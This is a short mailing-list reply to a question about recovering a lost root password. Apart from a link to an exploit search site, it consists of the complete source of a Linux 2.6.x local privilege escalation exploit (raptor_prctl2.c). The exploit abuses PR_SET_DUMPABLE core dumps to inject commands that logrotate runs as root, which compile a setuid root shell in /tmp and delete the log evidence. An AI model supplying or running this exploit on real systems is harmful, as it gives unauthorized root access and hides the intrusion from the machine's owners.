[sf-lug] recovery from loss of root password

[Kristian Erik Hermansen]

http://milw0rm.com/search.php?dong=ubuntu

 - OR -

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <signal.h>
#include <sys/stat.h>
#include <sys/resource.h>
#include <sys/prctl.h>

#define INFO1	"raptor_prctl2.c - Linux 2.6.x suid_dumpable2 (logrotate)"
#define	INFO2	"Copyright (c) 2006 Marco Ivaldi <raptor at 0xdeadbeef.info>"

char payload[] = /* commands to be executed by privileged logrotate */
"\n/var/log/core {\n    daily\n    size=0\n    firstaction\n
chown root /tmp/pwned; chmod 4755 /tmp/pwned; rm -f
/etc/logrotate.d/core; rm -f /var/log/core*\n    endscript\n}\n";

char pwnage[] = /* build setuid() helper to circumvent bash checks */
"echo \"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\" >
/tmp/pwned.c; gcc /tmp/pwned.c -o /tmp/pwned &>/dev/null; rm -f
/tmp/pwned.c";

int main(void)
{
	int 		pid;
	struct rlimit 	corelimit;
	struct stat	st;

	/* print exploit information */
	fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);

	/* prepare the setuid() helper */
	system(pwnage);

	/* set core size to unlimited */
	corelimit.rlim_cur = RLIM_INFINITY;
	corelimit.rlim_max = RLIM_INFINITY;
	setrlimit(RLIMIT_CORE, &corelimit);

	/* let's create a fake logfile in /var/log */
	if (!(pid = fork())) {
		chdir("/var/log");
		prctl(PR_SET_DUMPABLE, 2);
		sleep(666);
		exit(1);
	}
	kill(pid, SIGSEGV);

	/* let's do the PR_SET_DUMPABLE magic */
	if (!(pid = fork())) {
		chdir("/etc/logrotate.d");
		prctl(PR_SET_DUMPABLE, 2);
		sleep(666);
		exit(1);
	}
	kill(pid, SIGSEGV);

	/* did it work? */
	sleep(3);
	if ((stat("/var/log/core", &st) < 0) ||
	    (stat("/etc/logrotate.d/core", &st) < 0)) {
		fprintf(stderr, "Error: Not vulnerable? See comments.\n");
		exit(1);
	}

	/* total pwnage */
	fprintf(stderr, "Please wait until logrotate is run and check /tmp/pwned;)\n");
	exit(0);
}
-- 
Kristian Erik Hermansen